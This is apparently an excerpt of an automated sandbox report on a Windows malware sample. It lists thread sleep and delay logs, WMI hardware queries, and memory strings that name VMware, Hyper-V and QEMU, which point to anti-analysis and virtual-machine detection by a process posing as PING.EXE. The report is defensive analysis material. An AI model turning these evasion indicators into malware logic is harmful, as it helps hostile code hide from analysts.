              Source: C:\Windows\SysWOW64\PING.EXE TID: 7612Thread sleep time: -31620s >= -30000sJump to behavior
              Source: C:\Windows\SysWOW64\PING.EXE TID: 7612Thread sleep time: -39000s >= -30000sJump to behavior
              Source: C:\Windows\SysWOW64\PING.EXE TID: 7612Thread sleep time: -38874s >= -30000sJump to behavior
              Source: C:\Windows\SysWOW64\PING.EXE TID: 7612Thread sleep time: -38765s >= -30000sJump to behavior
              Source: C:\Windows\SysWOW64\PING.EXE TID: 7612Thread sleep time: -38650s >= -30000sJump to behavior
              Source: C:\Windows\SysWOW64\PING.EXE TID: 7612Thread sleep time: -38531s >= -30000sJump to behavior
              Source: C:\Windows\SysWOW64\PING.EXE TID: 7612Thread sleep time: -38421s >= -30000sJump to behavior
              Source: C:\Windows\SysWOW64\PING.EXE TID: 7612Thread sleep time: -38310s >= -30000sJump to behavior
              Source: C:\Windows\SysWOW64\PING.EXE TID: 7612Thread sleep time: -38203s >= -30000sJump to behavior
              Source: C:\Windows\SysWOW64\PING.EXE TID: 7612Thread sleep time: -38093s >= -30000sJump to behavior
              Source: C:\Windows\SysWOW64\PING.EXE TID: 7612Thread sleep time: -37984s >= -30000sJump to behavior
              Source: C:\Windows\SysWOW64\PING.EXE TID: 7612Thread sleep time: -37865s >= -30000sJump to behavior
              Source: C:\Windows\SysWOW64\PING.EXE TID: 7612Thread sleep time: -37734s >= -30000sJump to behavior
              Source: C:\Windows\SysWOW64\PING.EXE TID: 7612Thread sleep time: -37625s >= -30000sJump to behavior
              Source: C:\Windows\SysWOW64\PING.EXE TID: 7612Thread sleep time: -37515s >= -30000sJump to behavior
              Source: C:\Windows\SysWOW64\PING.EXE TID: 7612Thread sleep time: -37406s >= -30000sJump to behavior
              Source: C:\Windows\SysWOW64\PING.EXE TID: 7612Thread sleep time: -37292s >= -30000sJump to behavior
              Source: C:\Windows\SysWOW64\PING.EXE TID: 7612Thread sleep time: -37171s >= -30000sJump to behavior
              Source: C:\Windows\SysWOW64\PING.EXE TID: 7612Thread sleep time: -37053s >= -30000sJump to behavior
              Source: C:\Windows\SysWOW64\PING.EXE TID: 7612Thread sleep time: -36927s >= -30000sJump to behavior
              Source: C:\Windows\SysWOW64\PING.EXE TID: 7612Thread sleep time: -36796s >= -30000sJump to behavior
              Source: C:\Windows\SysWOW64\PING.EXE TID: 7612Thread sleep time: -36687s >= -30000sJump to behavior
              Source: C:\Windows\SysWOW64\PING.EXE TID: 7612Thread sleep time: -36574s >= -30000sJump to behavior
              Source: C:\Windows\SysWOW64\PING.EXE TID: 7612Thread sleep time: -36466s >= -30000sJump to behavior
              Source: C:\Windows\SysWOW64\PING.EXE TID: 7612Thread sleep time: -36353s >= -30000sJump to behavior
              Source: C:\Windows\SysWOW64\PING.EXE TID: 7612Thread sleep time: -36247s >= -30000sJump to behavior
              Source: C:\Windows\SysWOW64\PING.EXE TID: 7612Thread sleep time: -36125s >= -30000sJump to behavior
              Source: C:\Windows\SysWOW64\PING.EXE TID: 7612Thread sleep time: -36015s >= -30000sJump to behavior
              Source: C:\Windows\SysWOW64\PING.EXE TID: 7612Thread sleep time: -35902s >= -30000sJump to behavior
              Source: C:\Windows\SysWOW64\PING.EXE TID: 7612Thread sleep time: -35781s >= -30000sJump to behavior
              Source: C:\Windows\SysWOW64\PING.EXE TID: 7612Thread sleep time: -35671s >= -30000sJump to behavior
              Source: C:\Windows\SysWOW64\PING.EXE TID: 7612Thread sleep time: -35553s >= -30000sJump to behavior
              Source: C:\Windows\SysWOW64\PING.EXE TID: 7612Thread sleep time: -35420s >= -30000sJump to behavior
              Source: C:\Windows\SysWOW64\PING.EXE TID: 7612Thread sleep time: -35279s >= -30000sJump to behavior
              Source: C:\Windows\SysWOW64\PING.EXE TID: 7612Thread sleep time: -35125s >= -30000sJump to behavior
              Source: C:\Windows\SysWOW64\PING.EXE TID: 7612Thread sleep time: -34980s >= -30000sJump to behavior
              Source: C:\Windows\SysWOW64\PING.EXE TID: 7612Thread sleep time: -34871s >= -30000sJump to behavior
              Source: C:\Windows\SysWOW64\PING.EXE TID: 7612Thread sleep time: -34750s >= -30000sJump to behavior
              Source: C:\Windows\SysWOW64\PING.EXE TID: 7612Thread sleep time: -34599s >= -30000sJump to behavior
              Source: C:\Windows\SysWOW64\PING.EXE TID: 7612Thread sleep time: -34470s >= -30000sJump to behavior
              Source: C:\Windows\SysWOW64\PING.EXE TID: 7612Thread sleep time: -34347s >= -30000sJump to behavior
              Source: C:\Windows\SysWOW64\PING.EXE TID: 7612Thread sleep time: -34218s >= -30000sJump to behavior
              Source: C:\Windows\SysWOW64\PING.EXE TID: 7612Thread sleep time: -34069s >= -30000sJump to behavior
              Source: C:\Windows\SysWOW64\PING.EXE TID: 7612Thread sleep time: -33940s >= -30000sJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7480Thread sleep time: -922337203685477s >= -30000sJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7544Thread sleep count: 5326 > 30
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7540Thread sleep count: 3148 > 30
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7608Thread sleep time: -24903104499507879s >= -30000s
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7560Thread sleep time: -1844674407370954s >= -30000s
              Source: C:\Windows\SysWOW64\PING.EXE TID: 8160Thread sleep time: -21213755684765971s >= -30000s
              Source: C:\Windows\SysWOW64\PING.EXE TID: 8160Thread sleep time: -35000s >= -30000s
              Source: C:\Windows\SysWOW64\PING.EXE TID: 8160Thread sleep time: -34891s >= -30000s
              Source: C:\Windows\SysWOW64\PING.EXE TID: 8160Thread sleep time: -69532s >= -30000s
              Source: C:\Windows\SysWOW64\PING.EXE TID: 8160Thread sleep time: -34654s >= -30000s
              Source: C:\Windows\SysWOW64\PING.EXE TID: 8160Thread sleep time: -34532s >= -30000s
              Source: C:\Windows\SysWOW64\PING.EXE TID: 8160Thread sleep time: -34422s >= -30000s
              Source: C:\Windows\SysWOW64\PING.EXE TID: 8160Thread sleep time: -34310s >= -30000s
              Source: C:\Windows\SysWOW64\PING.EXE TID: 8160Thread sleep time: -34197s >= -30000s
              Source: C:\Windows\SysWOW64\PING.EXE TID: 8160Thread sleep time: -34079s >= -30000s
              Source: C:\Windows\SysWOW64\PING.EXE TID: 8160Thread sleep time: -33967s >= -30000s
              Source: C:\Windows\SysWOW64\PING.EXE TID: 8160Thread sleep time: -33844s >= -30000s
              Source: C:\Windows\SysWOW64\PING.EXE TID: 8160Thread sleep time: -33734s >= -30000s
              Source: C:\Windows\SysWOW64\PING.EXE TID: 8160Thread sleep time: -33623s >= -30000s
              Source: C:\Windows\SysWOW64\PING.EXE TID: 8160Thread sleep time: -33500s >= -30000s
              Source: C:\Windows\SysWOW64\PING.EXE TID: 8160Thread sleep time: -33313s >= -30000s
              Source: C:\Windows\SysWOW64\PING.EXE TID: 8160Thread sleep time: -37000s >= -30000s
              Source: C:\Windows\SysWOW64\PING.EXE TID: 8160Thread sleep time: -36890s >= -30000s
              Source: C:\Windows\SysWOW64\PING.EXE TID: 8160Thread sleep time: -36769s >= -30000s
              Source: C:\Windows\SysWOW64\PING.EXE TID: 8160Thread sleep time: -36641s >= -30000s
              Source: C:\Windows\SysWOW64\PING.EXE TID: 8160Thread sleep time: -36531s >= -30000s
              Source: C:\Windows\SysWOW64\PING.EXE TID: 8160Thread sleep time: -36422s >= -30000s
              Source: C:\Windows\SysWOW64\PING.EXE TID: 8160Thread sleep time: -36312s >= -30000s
              Source: C:\Windows\SysWOW64\PING.EXE TID: 8160Thread sleep time: -36203s >= -30000s
              Source: C:\Windows\SysWOW64\PING.EXE TID: 8160Thread sleep time: -36083s >= -30000s
              Source: C:\Windows\SysWOW64\PING.EXE TID: 8160Thread sleep time: -35953s >= -30000s
              Source: C:\Windows\SysWOW64\PING.EXE TID: 8160Thread sleep time: -35844s >= -30000s
              Source: C:\Windows\SysWOW64\PING.EXE TID: 8160Thread sleep time: -35734s >= -30000s
              Source: C:\Windows\SysWOW64\PING.EXE TID: 8160Thread sleep time: -35625s >= -30000s
              Source: C:\Windows\SysWOW64\PING.EXE TID: 8160Thread sleep time: -35508s >= -30000s
              Source: C:\Windows\SysWOW64\PING.EXE TID: 8160Thread sleep time: -35375s >= -30000s
              Source: C:\Windows\SysWOW64\PING.EXE TID: 8160Thread sleep time: -35233s >= -30000s
              Source: C:\Windows\SysWOW64\PING.EXE TID: 8160Thread sleep time: -35124s >= -30000s
              Source: C:\Windows\SysWOW64\PING.EXE TID: 8160Thread sleep time: -35015s >= -30000s
              Source: C:\Windows\SysWOW64\PING.EXE TID: 8160Thread sleep time: -34655s >= -30000s
              Source: C:\Windows\SysWOW64\PING.EXE TID: 8160Thread sleep time: -34545s >= -30000s
              Source: C:\Windows\SysWOW64\PING.EXE TID: 8160Thread sleep time: -34437s >= -30000s
              Source: C:\Windows\SysWOW64\PING.EXE TID: 8160Thread sleep time: -34328s >= -30000s
              Source: C:\Windows\SysWOW64\PING.EXE TID: 8160Thread sleep time: -34218s >= -30000s
              Source: C:\Windows\SysWOW64\PING.EXE TID: 8160Thread sleep time: -34109s >= -30000s
              Source: C:\Windows\SysWOW64\PING.EXE TID: 8160Thread sleep time: -33994s >= -30000s
              Source: C:\Windows\System32\taskkill.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
              Source: C:\Windows\System32\taskkill.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
              Source: C:\Windows\SysWOW64\PING.EXEWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
              Source: C:\Windows\SysWOW64\PING.EXEWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
              Source: C:\Windows\SysWOW64\PING.EXEWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
              Source: C:\Windows\SysWOW64\PING.EXEWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
              Source: C:\Windows\System32\taskkill.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_ComputerSystem
              Source: C:\Windows\SysWOW64\PING.EXEWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_ComputerSystem
              Source: C:\Windows\SysWOW64\PING.EXEWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_ComputerSystem
              Source: C:\Windows\System32\taskkill.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
              Source: C:\Windows\System32\taskkill.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
              Source: C:\Windows\System32\taskkill.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
              Source: C:\Windows\SysWOW64\PING.EXEWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
              Source: C:\Windows\SysWOW64\PING.EXEWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
              Source: C:\Windows\SysWOW64\PING.EXEWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
              Source: C:\Windows\SysWOW64\PING.EXEWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
              Source: C:\Windows\SysWOW64\PING.EXEWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
              Source: C:\Windows\SysWOW64\PING.EXEWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Windows\SysWOW64\PING.EXEThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Windows\SysWOW64\PING.EXEThread delayed: delay time: 33000Jump to behavior
              Source: C:\Windows\SysWOW64\PING.EXEThread delayed: delay time: 32875Jump to behavior
              Source: C:\Windows\SysWOW64\PING.EXEThread delayed: delay time: 32759Jump to behavior
              Source: C:\Windows\SysWOW64\PING.EXEThread delayed: delay time: 32648Jump to behavior
              Source: C:\Windows\SysWOW64\PING.EXEThread delayed: delay time: 32532Jump to behavior
              Source: C:\Windows\SysWOW64\PING.EXEThread delayed: delay time: 32419Jump to behavior
              Source: C:\Windows\SysWOW64\PING.EXEThread delayed: delay time: 32308Jump to behavior
              Source: C:\Windows\SysWOW64\PING.EXEThread delayed: delay time: 32193Jump to behavior
              Source: C:\Windows\SysWOW64\PING.EXEThread delayed: delay time: 31954Jump to behavior
              Source: C:\Windows\SysWOW64\PING.EXEThread delayed: delay time: 31736Jump to behavior
              Source: C:\Windows\SysWOW64\PING.EXEThread delayed: delay time: 31620Jump to behavior
              Source: C:\Windows\SysWOW64\PING.EXEThread delayed: delay time: 39000Jump to behavior
              Source: C:\Windows\SysWOW64\PING.EXEThread delayed: delay time: 38874Jump to behavior
              Source: C:\Windows\SysWOW64\PING.EXEThread delayed: delay time: 38765Jump to behavior
              Source: C:\Windows\SysWOW64\PING.EXEThread delayed: delay time: 38650Jump to behavior
              Source: C:\Windows\SysWOW64\PING.EXEThread delayed: delay time: 38531Jump to behavior
              Source: C:\Windows\SysWOW64\PING.EXEThread delayed: delay time: 38421Jump to behavior
              Source: C:\Windows\SysWOW64\PING.EXEThread delayed: delay time: 38310Jump to behavior
              Source: C:\Windows\SysWOW64\PING.EXEThread delayed: delay time: 38203Jump to behavior
              Source: C:\Windows\SysWOW64\PING.EXEThread delayed: delay time: 38093Jump to behavior
              Source: C:\Windows\SysWOW64\PING.EXEThread delayed: delay time: 37984Jump to behavior
              Source: C:\Windows\SysWOW64\PING.EXEThread delayed: delay time: 37865Jump to behavior
              Source: C:\Windows\SysWOW64\PING.EXEThread delayed: delay time: 37734Jump to behavior
              Source: C:\Windows\SysWOW64\PING.EXEThread delayed: delay time: 37625Jump to behavior
              Source: C:\Windows\SysWOW64\PING.EXEThread delayed: delay time: 37515Jump to behavior
              Source: C:\Windows\SysWOW64\PING.EXEThread delayed: delay time: 37406Jump to behavior
              Source: C:\Windows\SysWOW64\PING.EXEThread delayed: delay time: 37292Jump to behavior
              Source: C:\Windows\SysWOW64\PING.EXEThread delayed: delay time: 37171Jump to behavior
              Source: C:\Windows\SysWOW64\PING.EXEThread delayed: delay time: 37053Jump to behavior
              Source: C:\Windows\SysWOW64\PING.EXEThread delayed: delay time: 36927Jump to behavior
              Source: C:\Windows\SysWOW64\PING.EXEThread delayed: delay time: 36796Jump to behavior
              Source: C:\Windows\SysWOW64\PING.EXEThread delayed: delay time: 36687Jump to behavior
              Source: C:\Windows\SysWOW64\PING.EXEThread delayed: delay time: 36574Jump to behavior
              Source: C:\Windows\SysWOW64\PING.EXEThread delayed: delay time: 36466Jump to behavior
              Source: C:\Windows\SysWOW64\PING.EXEThread delayed: delay time: 36353Jump to behavior
              Source: C:\Windows\SysWOW64\PING.EXEThread delayed: delay time: 36247Jump to behavior
              Source: C:\Windows\SysWOW64\PING.EXEThread delayed: delay time: 36125Jump to behavior
              Source: C:\Windows\SysWOW64\PING.EXEThread delayed: delay time: 36015Jump to behavior
              Source: C:\Windows\SysWOW64\PING.EXEThread delayed: delay time: 35902Jump to behavior
              Source: C:\Windows\SysWOW64\PING.EXEThread delayed: delay time: 35781Jump to behavior
              Source: C:\Windows\SysWOW64\PING.EXEThread delayed: delay time: 35671Jump to behavior
              Source: C:\Windows\SysWOW64\PING.EXEThread delayed: delay time: 35553Jump to behavior
              Source: C:\Windows\SysWOW64\PING.EXEThread delayed: delay time: 35420Jump to behavior
              Source: C:\Windows\SysWOW64\PING.EXEThread delayed: delay time: 35279Jump to behavior
              Source: C:\Windows\SysWOW64\PING.EXEThread delayed: delay time: 35125Jump to behavior
              Source: C:\Windows\SysWOW64\PING.EXEThread delayed: delay time: 34980Jump to behavior
              Source: C:\Windows\SysWOW64\PING.EXEThread delayed: delay time: 34871Jump to behavior
              Source: C:\Windows\SysWOW64\PING.EXEThread delayed: delay time: 34750Jump to behavior
              Source: C:\Windows\SysWOW64\PING.EXEThread delayed: delay time: 34599Jump to behavior
              Source: C:\Windows\SysWOW64\PING.EXEThread delayed: delay time: 34470Jump to behavior
              Source: C:\Windows\SysWOW64\PING.EXEThread delayed: delay time: 34347Jump to behavior
              Source: C:\Windows\SysWOW64\PING.EXEThread delayed: delay time: 34218Jump to behavior
              Source: C:\Windows\SysWOW64\PING.EXEThread delayed: delay time: 34069Jump to behavior
              Source: C:\Windows\SysWOW64\PING.EXEThread delayed: delay time: 33940Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
              Source: C:\Windows\SysWOW64\PING.EXEThread delayed: delay time: 922337203685477
              Source: C:\Windows\SysWOW64\PING.EXEThread delayed: delay time: 35000
              Source: C:\Windows\SysWOW64\PING.EXEThread delayed: delay time: 34891
              Source: C:\Windows\SysWOW64\PING.EXEThread delayed: delay time: 34766
              Source: C:\Windows\SysWOW64\PING.EXEThread delayed: delay time: 34654
              Source: C:\Windows\SysWOW64\PING.EXEThread delayed: delay time: 34532
              Source: C:\Windows\SysWOW64\PING.EXEThread delayed: delay time: 34422
              Source: C:\Windows\SysWOW64\PING.EXEThread delayed: delay time: 34310
              Source: C:\Windows\SysWOW64\PING.EXEThread delayed: delay time: 34197
              Source: C:\Windows\SysWOW64\PING.EXEThread delayed: delay time: 34079
              Source: C:\Windows\SysWOW64\PING.EXEThread delayed: delay time: 33967
              Source: C:\Windows\SysWOW64\PING.EXEThread delayed: delay time: 33844
              Source: C:\Windows\SysWOW64\PING.EXEThread delayed: delay time: 33734
              Source: C:\Windows\SysWOW64\PING.EXEThread delayed: delay time: 33623
              Source: C:\Windows\SysWOW64\PING.EXEThread delayed: delay time: 33500
              Source: C:\Windows\SysWOW64\PING.EXEThread delayed: delay time: 33313
              Source: C:\Windows\SysWOW64\PING.EXEThread delayed: delay time: 37000
              Source: C:\Windows\SysWOW64\PING.EXEThread delayed: delay time: 36890
              Source: C:\Windows\SysWOW64\PING.EXEThread delayed: delay time: 36769
              Source: C:\Windows\SysWOW64\PING.EXEThread delayed: delay time: 36641
              Source: C:\Windows\SysWOW64\PING.EXEThread delayed: delay time: 36531
              Source: C:\Windows\SysWOW64\PING.EXEThread delayed: delay time: 36422
              Source: C:\Windows\SysWOW64\PING.EXEThread delayed: delay time: 36312
              Source: C:\Windows\SysWOW64\PING.EXEThread delayed: delay time: 36203
              Source: C:\Windows\SysWOW64\PING.EXEThread delayed: delay time: 36083
              Source: C:\Windows\SysWOW64\PING.EXEThread delayed: delay time: 35953
              Source: C:\Windows\SysWOW64\PING.EXEThread delayed: delay time: 35844
              Source: C:\Windows\SysWOW64\PING.EXEThread delayed: delay time: 35734
              Source: C:\Windows\SysWOW64\PING.EXEThread delayed: delay time: 35625
              Source: C:\Windows\SysWOW64\PING.EXEThread delayed: delay time: 35508
              Source: C:\Windows\SysWOW64\PING.EXEThread delayed: delay time: 35375
              Source: C:\Windows\SysWOW64\PING.EXEThread delayed: delay time: 35233
              Source: C:\Windows\SysWOW64\PING.EXEThread delayed: delay time: 35124
              Source: C:\Windows\SysWOW64\PING.EXEThread delayed: delay time: 35015
              Source: C:\Windows\SysWOW64\PING.EXEThread delayed: delay time: 34655
              Source: C:\Windows\SysWOW64\PING.EXEThread delayed: delay time: 34545
              Source: C:\Windows\SysWOW64\PING.EXEThread delayed: delay time: 34437
              Source: C:\Windows\SysWOW64\PING.EXEThread delayed: delay time: 34328
              Source: C:\Windows\SysWOW64\PING.EXEThread delayed: delay time: 34218
              Source: C:\Windows\SysWOW64\PING.EXEThread delayed: delay time: 34109
              Source: C:\Windows\SysWOW64\PING.EXEThread delayed: delay time: 33994
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\RoamingJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.iniJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\userJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\MicrosoftJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppDataJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\WindowsJump to behavior
              Source: PING.EXE, 0000000A.00000002.2194405756.0000000004F09000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: $^qSD:\sources\replacementmanifests\microsoft-hyper-v-drivers-migration-replacement.man
              Source: PING.EXE, 0000000A.00000002.2220634073.0000000005FF0000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: {6D809377-6AF0-444B-8957-A3773F02200E}\Hyper-V\VMCreate.exe10779
              Source: explorer.exe, 00000006.00000002.2927964458.000000000982D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.1731694645.000000000982D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.2927964458.00000000097D4000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.1731694645.00000000097D4000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
              Source: PING.EXE, 0000000A.00000002.2194405756.0000000004E21000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: vmGuestLib.dllDselect * from Win32_ComputerSystem
              Source: explorer.exe, 00000006.00000000.1732168635.0000000009977000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\4&224f42ef&0&000000
              Source: PING.EXE, 0000000A.00000002.2220634073.0000000005FF0000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: VMware.Workstation.vmui7769
              Source: PING.EXE, 0000000A.00000002.2220634073.0000000005EC5000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: *|turn windows features on or off*|hyper-v:wux:hyper-v4937
              Source: PING.EXE, 0000000A.00000002.2220634073.0000000005FF0000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: *|vmware horizon client*|vm ware8394
              Source: explorer.exe, 00000006.00000000.1732168635.0000000009977000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: VMware SATA CD00
              Source: explorer.exe, 00000006.00000002.2924016491.00000000078AD000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: NXTTAVMWare
              Source: explorer.exe, 00000006.00000002.2927964458.0000000009815000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\4&224f&0&000000
              Source: PING.EXE, 0000000A.00000002.2194405756.0000000004E21000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 0VMware|VIRTUAL|A M I|Xen4win32_process.handle='{0}'
              Source: PING.EXE, 0000000A.00000002.2194405756.0000000004F09000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: @\^qP\Moonchild Productions\Basilisk\PrlFS
              Source: PING.EXE, 0000000A.00000002.2194405756.0000000004E21000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: model0Microsoft|VMWare|Virtual
              Source: PING.EXE, 0000000A.00000002.2194405756.0000000004F09000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: $^qKD:\sources\replacementmanifests\microsoft-hyper-v-migration-replacement.man
              Source: explorer.exe, 00000006.00000002.2924016491.0000000007A34000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.1730178532.0000000007A34000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWen-GBnx
              Source: PING.EXE, 0000000A.00000002.2220634073.0000000005FF0000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: *|vmware workstation 12 player*|vmpl5459
              Source: PING.EXE, 0000000A.00000002.2220634073.0000000005FF0000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: *|*|vmware6886
              Source: PING.EXE, 0000000A.00000002.2220634073.0000000005FF0000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: *|hyper-v manager*|vm4595
              Source: explorer.exe, 00000006.00000000.1731694645.0000000009660000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\4&224F42EF&0&000000er
              Source: PING.EXE, 0000000A.00000002.2220634073.0000000005FF0000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: *|vmware horizon client*|vmare7220
              Source: explorer.exe, 00000006.00000000.1728875107.0000000001240000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
              Source: PING.EXE, 0000000A.00000002.2220634073.0000000005FF0000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: VMware.Horizon.Client8097
              Source: explorer.exe, 00000006.00000000.1732168635.00000000098A8000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: k&Ven_VMware&Prod_Virtual_disk\4&1656f219&0&000000
              Source: PING.EXE, 0000000A.00000002.2220634073.0000000005FF0000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: *|vmware workstation 15 player*|vmplayer6438
              Source: explorer.exe, 00000006.00000000.1728875107.0000000001240000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\4&1656F219&0&0000000}
              Source: PING.EXE, 0000000A.00000002.2220634073.0000000005FF0000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: *|*|qemu10642
              Source: PING.EXE, 0000000A.00000002.2194405756.0000000004F09000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: $^q3microsoft-hyper-v-drivers-migration-replacement.man
              Source: PING.EXE, 0000000A.00000002.2220634073.0000000005FF0000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: *|hyper-v manager*|hyperv4178
              Source: PING.EXE, 0000000A.00000002.2220634073.0000000005FF0000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: *|hyper-v manager*|virtual5441
              Source: PING.EXE, 0000000A.00000002.2220634073.0000000005FF0000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: VMware.Workstation.vmplayer8211
              Source: PING.EXE, 0000000A.00000002.2220634073.0000000005FF0000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: VMware.View.Client12451
              Source: PING.EXE, 0000000A.00000002.2192781246.0000000003130000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
              Source: PING.EXE, 0000000A.00000002.2220634073.0000000005FF0000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: {7C5A40EF-A0FB-4BFC-874A-C0F2E0B9FA8E}\VMware\Infrastructure\Virtual Infrastructure Client\Launcher\VpxClient.exe8601
              Source: PING.EXE, 0000000A.00000002.2220634073.0000000005FF0000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: {7C5A40EF-A0FB-4BFC-874A-C0F2E0B9FA8E}\VMware\VMware Workstation\vmnetcfg.exe12004
              Source: explorer.exe, 00000006.00000002.2927964458.0000000009815000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: NECVMWar VMware SATA CD00\w
              Source: explorer.exe, 00000006.00000002.2927964458.0000000009815000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#4&224f42ef&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}$
              Source: explorer.exe, 00000006.00000000.1732168635.00000000098A8000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\4&1656f219&0&000000
              Source: PING.EXE, 0000000A.00000002.2220634073.0000000005FF0000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: *|vmware vsphere client*|vspe6388
              Source: PING.EXE, 0000000A.00000002.2220634073.0000000005FF0000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: AirWatchLLC.VMwareWorkspaceONE_htcwkw4rx2gx4!App11496
              Source: PING.EXE, 0000000A.00000002.2220634073.0000000005FF0000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: *|vmware horizon client*|vdi3894
              Source: PING.EXE, 0000000A.00000002.2220634073.0000000005FF0000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: *|hyper-v manager*|hyper v4919
              Source: PING.EXE, 0000000A.00000002.2220634073.0000000005FF0000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: {7C5A40EF-A0FB-4BFC-874A-C0F2E0B9FA8E}\VMware\VMware vCenter Converter Standalone\converter.exe12207
              Source: PING.EXE, 0000000A.00000002.2220634073.0000000005FF0000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: *|vmware horizon client*|view5503
              Source: PING.EXE, 0000000A.00000002.2194405756.0000000004F09000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: $^qRD:\sources\replacementmanifests\microsoft-hyper-v-client-migration-replacement.man
